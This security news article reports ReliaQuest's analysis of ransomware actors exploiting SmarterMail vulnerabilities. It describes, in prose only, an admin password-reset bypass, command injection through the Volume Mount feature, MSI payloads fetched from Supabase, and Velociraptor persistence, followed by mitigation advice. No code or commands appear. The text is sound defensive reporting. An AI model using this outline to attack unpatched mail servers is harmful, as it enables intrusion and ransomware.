SmarterMail flaw exploited in China-linked ransomware push

ReliaQuest reports active exploitation of a vulnerability in SmarterTools SmarterMail email server software that could allow an unauthenticated attacker to reset administrator passwords and take over exposed systems.

With moderate-to-high confidence, ReliaQuest links the activity to Storm-2603, which it describes as a China-based actor associated with Warlock ransomware operations. The firm says it has not previously seen the group use the SmarterMail flaw, tracked as CVE-2026-23760, for initial access.

The findings add to concerns about internet-facing mail infrastructure. Email servers sit on the public web for webmail access and mail transfer services, making them frequent targets for scanning and repeated probing. Defenders often get little warning before exploitation attempts begin.

Account takeover

ReliaQuest's analysis places CVE-2026-23760 in a password reset workflow. Attackers can reset an administrator password through the password reset API because vulnerable SmarterMail builds fail to verify that the old password provided is correct. As a result, incorrect input can be accepted as proof of identity.

This behaviour can give an attacker administrative control of the SmarterMail application without valid credentials. It does not automatically provide code execution on the underlying Windows server, a key step in many ransomware operations.

Feature abuse

ReliaQuest says Storm-2603 chained the authentication bypass with an administrative SmarterMail feature called Volume Mount, which lets administrators specify commands to mount network drives. The firm says the application does not filter the commands entered.

ReliaQuest says the attackers exploited that trust relationship to inject arbitrary commands rather than legitimate mount instructions. Those commands inherit the permissions of the SmarterMail service, potentially giving the attacker administrative control of the Windows operating system hosting the email server.

The sequence matters for defenders because it shows how an application-level takeover can escalate into system-level execution when combined with built-in administrative features. It also reflects a broader ransomware pattern: operators often combine weaknesses with legitimate functions to reduce detection rather than relying on a single exploit.

Persistence tooling

After gaining code execution, ReliaQuest says the activity aligned with Storm-2603 tradecraft seen in earlier campaigns. The group installed Velociraptor, a legitimate digital forensics and incident response tool used by security teams, as both a command-and-control mechanism and a persistence method.

ReliaQuest also described a download pattern using Windows Installer. The attackers abused msiexec to pull an MSI payload from Supabase, a legitimate cloud-based backend platform. It observed the SmarterMail process MailService.exe spawning a Windows command shell to execute the request.

In earlier Warlock activity, ReliaQuest says the group hosted MSI payloads on GitHub. The move to Supabase suggests an infrastructure change that could bypass existing blocklists and detection rules.

ReliaQuest did not observe a ransomware executable deployed in the incident it investigated. However, it says the tactics, techniques, and procedures matched confirmed Warlock attacks, including the use of MSI installers and Velociraptor for command-and-control. The firm assessed the activity was most likely interrupted during a staging phase.

Second vulnerability

The activity coincides with separate warnings about exploitation of another SmarterMail vulnerability. CISA issued an alert that ransomware actors were exploiting CVE-2026-24423, and ReliaQuest says it saw probes for that flaw alongside the Storm-2603 activity.

ReliaQuest says attempts involving CVE-2026-24423 came from different infrastructure than the activity linked to CVE-2026-23760. That leaves open whether Storm-2603 rotated IP addresses or whether another group used the same window to probe exposed servers.

The overlap suggests defenders may face multiple intrusion paths at once. Internet-facing servers can draw opportunistic scanning while targeted actors pursue their own exploitation chains, complicating incident response and root-cause analysis-especially when logs show multiple API calls tied to different vulnerabilities.

Mitigation steps

ReliaQuest recommends upgrading SmarterMail to Build 9511 or later. It also advises strictly isolating mail servers from internal networks to limit lateral movement. Another measure is outbound traffic control, using firewall rules to restrict external communications to necessary mail protocols and block other outbound connections that could support command-and-control.

ReliaQuest frames patching as necessary but not sufficient when an attacker has already established persistence. Legitimate tooling can allow operators to remain in an environment after a vulnerability is fixed, increasing the need for threat hunting and remediation focused on processes and network activity.

"Specific attribution matters less than the operational reality: Internet-facing servers are being targeted by multiple vectors simultaneously. Patching one entry point is insufficient if the adversary is actively pivoting to another or-worse-has already established persistence using legitimate tools."

ReliaQuest expects ransomware groups to continue rapidly weaponising vendor fixes and to keep targeting edge systems such as mail servers, VPNs, and file transfer gateways for initial access and follow-on intrusion activity.